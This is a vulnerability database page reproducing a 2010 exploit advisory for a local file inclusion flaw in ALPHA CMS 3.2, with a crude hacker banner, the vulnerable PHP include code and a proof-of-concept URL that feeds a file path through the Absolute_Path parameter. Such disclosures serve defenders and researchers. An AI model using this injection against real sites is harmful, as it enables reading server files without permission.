Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:23510
HistoryApr 05, 2010 - 12:00 a.m.

ALPHA CMS v3.2 <= Local File Inclusion Vulnerability

2010-04-0500:00:00
vulners.com
18
JSON

########################################################

fucking the Web Apps [attack edition]

/\ `\ /\ \ __ /\ \__/\ \
\ \ \L\\__ __ \ \ \/'\ /\\ ___ __ \ \ ,\ \ \__ __
\ \ \/\ \/\ \ /'\ \ , < \/\ \ /' _ `\ /' `\ \ \ \/\ \ _ `\ /'`\
\ \ \/\ \ \_\ \/\ \/\ \ \\`\\ \ \/\ \/\ \/\ \L\ \ \ \ \\ \ \ \ \/\ __/
\ \\ \ \/\ \\\ \\ \\ \\ \\ \\ \___ \ \ \\\ \\ \\ \\
\// \// \// \//\//\//\//\//\/L\ \ \// \//\//\//
/\/
\_//
__ __ __ ______ Hack0wn! Security Project
/\ \ /\ \ /\ \ /\ _ \
\ \ \/\ \ \ \ \ \ \ \ \ \L\ \ _____ _____ ____
\ \ \ \ \ \ \ /'`\ \ '`\ \ \ __ \/\ '`\/\ '`\ /',\
\ \ \/ \\ \/\ /\ \ \L\ \ \ \ \/\ \ \ \L\ \ \ \L\ \/\, `\
\ `\x/\ \___\\ \,/ \ \\ \\ \ ,/\ \ ,/\/\____/
'\//// \// \// \//\//\ \ \/ \ \ \/ \//
\ \\ \ \\
\// \/_/

[+]Title : ALPHA CMS Local File Inclusion Vulnerability
[+]Version: 3.2
[+]Download: http://sourceforge.net/projects/alpha-cms/files/
[+]Author: eidelweiss
[+]Metode: Local File Inclusion
[+]CWE: 22

    [*]Special to Syabilla_putri &#40;I miss u so much to&#41;[*]

[!]Thank`s Fly To:

[~] Jose Luis Gongora Fernandez a.k.a JosS - sp3x (securityreason)
[~] exploit-db team (loneferret - Exploits - dookie2000ca)
[~] Inj3ct0r.com r0073r & 0x1D [Inj3ct0r Exploit Database] - [D]eal [C]yber

########################################################

Description:

ALPHA CMS is an A.P.I - free (Open Archiecture), MVC based Content Management System.
ALPHA CMS architecture gives the ability to easily create advanced web pages, add-ons or even other CMS.
ALPHA CMS is based on PHP, Smarty, JavaScript and MySQL.

    -=[ Vuln C0de ]=-

[!] File name: alpha.php

// Create a new ALPHA CMS object
$alpha = new ALPHA;

// Include DTBS class
require_once&#40;$alpha-&gt;Absolute_Path&#40;&#41; . &#39;db.php&#39;&#41;;

// Include CTRL class
require_once&#40;$alpha-&gt;Absolute_Path&#40;&#41; . &#39;controler.php&#39;&#41;;

// Include UTL class
require_once&#40;$alpha-&gt;Absolute_Path&#40;&#41; . &#39;utilities.php&#39;&#41;;

// Include STY class
require_once&#40;$alpha-&gt;Absolute_Path&#40;&#41; . &#39;smarty.php&#39;&#41;;


    -=[ Proof Of Concept ]=-

    http://127.0.0.1/alpha.php?Absolute_Path=[LFI]

######################=[E0F]=#############################

JSON